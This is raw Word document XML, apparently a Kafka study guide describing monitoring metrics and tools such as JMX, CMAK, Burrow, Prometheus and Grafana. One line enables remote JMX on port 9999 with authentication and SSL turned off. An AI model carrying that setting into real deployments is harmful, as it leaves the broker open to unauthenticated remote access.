    <w:p w14:paraId="4054FE5C" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139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FetchRequestRate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17AED6AE" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139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FetchRequestTimeMs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296EA116" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139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sumerLag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14269499" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139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Topic/Partition Metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271F6FA0" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139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artitionSize</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0A0FE2" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139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Number of Partitions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29104B3D" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139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artition Replication Status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712319A1" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:p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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9B37B6" w14:textId="77777777" w:rsidR="00312FAC" w:rsidRPr="0003272F" w:rsidRDefault="00312FAC" w:rsidP="0003272F">
      <w:p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monitoring involves tracking a variety of metrics at multiple levels (broker, producer, consumer, and system). By leveraging tools like JMX, Prometheus, Grafana, Burrow, Kafka Manager, and Confluent Control Center, you can ensure the health, performance, and reliability of your Kafka cluster. Proactive monitoring and alerting will help you identify issues like under-replicated partitions, consumer lag, and performance bottlenecks before they impact the overall system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A505A21" w14:textId="08CC98B2" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="000B3FC1">
      <w:pPr>
        <w:ind w:firstLine="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73FFA402">
          <v:rect id="_x0000_i3164" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="079E75D0" w14:textId="0D085168" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB22BB" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="788" w:name="_Toc196308268"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Discuss tools and techniques for monitoring Kafka performance and health (e.g., JMX metrics, Kafka Manager, Burrow, Prometheus)</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="788"/>
    </w:p>
    <w:p w14:paraId="57C8FB6E" w14:textId="7B94885E" w:rsidR="00412451" w:rsidRPr="0003272F" w:rsidRDefault="00412451" w:rsidP="0003272F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FA670D8" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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Monitoring Kafka's performance and health is essential for ensuring that the system is operating efficiently and reliably. There are several tools and techniques available for monitoring Kafka, each offering different ways to track performance, identify issues, and provide insights into the Kafka cluster's behavior. Below are some of the most commonly used tools and techniques for monitoring Kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F440348" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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1. JMX Metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3EC1E3" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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Java Management Extensions (JMX)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a powerful mechanism for monitoring and managing Java applications, including Kafka. Kafka exposes a variety of metrics through JMX, which can be accessed via tools such as </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JConsole</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JVisualVM</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. These metrics provide real-time insights into Kafka's operations, such as message throughput, consumer lag, and partition replication status.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A10E69" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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ey Kafka Metrics Available via JMX:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB2B007" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139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roker Metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2817ED3D" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139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MessagesInPerSec: The rate at which messages are received by a broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F4F7D4" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139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BytesInPerSec, BytesOutPerSec: The rate at which bytes are received and sent by a broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D46279" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139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UnderReplicatedPartitions: The number of partitions that are under-replicated (i.e., the number of partitions that do not have the required number of replicas).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D2895B" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139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RequestHandlerAvgIdlePercent: The percentage of time the request handler is idle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EC5A41" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139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roducer Metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574F1C32" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139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duceRequestsPerSecond: The rate at which produce requests are sent to Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F986EE" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139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RequestSize: The size of the produce requests in bytes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBA06FE" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139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Metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAB1065" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139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FetchRequestRate: The rate of fetch requests sent by consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A0CF86" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139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FetchRequestTimeMs: The time it takes for the consumer to fetch data from a broker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4649E7" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="139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sumerLag: The lag between the consumer and the latest offset.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528E176E" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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How to Enable JMX in Kafka:</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> To expose JMX metrics, you need to configure Kafka brokers to use JMX by adding these options to your broker’s startup command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3025C22F" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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_OPTS="-Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=9999 -Dcom.sun.management.jmxremote.authenticate=false -Dcom.sun.management.jmxremote.ssl=false"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33975C24" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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You can then use tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JConsole</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JVisualVM</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, or the </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Prometheus JMX exporter</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to pull and visualize metrics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B6AD77" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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2. Kafka Manager (CMAK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2986A6" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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afka Manager (previously known as CMAK)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a tool for managing and monitoring Kafka clusters. It provides an easy-to-use web interface to manage brokers, topics, and consumer groups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531F4EAB" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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lastRenderedPageBreak/>
        <w:t>Key Features:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7319D115" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139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luster Overview</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides a view of all Kafka brokers, topics, and partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40770019" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139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Group Monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Tracks consumer groups, their offsets, and lag, helping to identify any consumer lag issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304BA775" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139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roker Health</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Displays metrics like broker uptime, partition replication status, and under-replicated partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61640E51" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139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Topic Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows users to create, delete, and manage Kafka topics.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568618F5" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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nstallation &amp; Setup</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka Manager is typically deployed as a web application. Once set up, you can monitor multiple Kafka clusters and perform management tasks directly through the interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71785F8B" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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3. Burrow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F650F5" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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urrow</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an open-source monitoring tool specifically designed for tracking Kafka consumer lag. It provides real-time tracking of Kafka consumers, including the amount of lag each consumer group is experiencing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518C8B6A" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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ey Features of Burrow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CD3521" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139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al-time Consumer Lag Monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Tracks how far behind consumers are from the latest message in the partition they are consuming from.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367C01BD" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139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Alerting</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Sends alerts when consumer lag exceeds predefined thresholds, enabling proactive handling of slow consumers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5B85D4" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139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API</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Provides a REST API to access consumer lag information, which can be integrated with other systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2829EB83" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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Burrow is particularly useful for monitoring consumer health, ensuring that consumers are processing messages efficiently and not falling too far behind.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3CBDBB" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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4. Prometheus &amp; Grafana</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1447912B" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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rometheus</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an open-source monitoring and alerting toolkit, and </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Grafana</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a popular dashboard tool for visualizing metrics. Together, they are commonly used to monitor Kafka’s performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1898D732" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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Prometheus Kafka Exporter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8451F6" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:ind w:firstLine="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he </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Exporter</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a Prometheus exporter that collects Kafka metrics via JMX and makes them available in a format that Prometheus can scrape. It provides key metrics for monitoring the health and performance of a Kafka cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01491812" w14:textId="77777777" w:rsidR="00C54169" w:rsidRPr="0003272F" w:rsidRDefault="00C54169" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139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roducer Metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Number of produce requests, request size, response times.</w:t>
      </w:r>
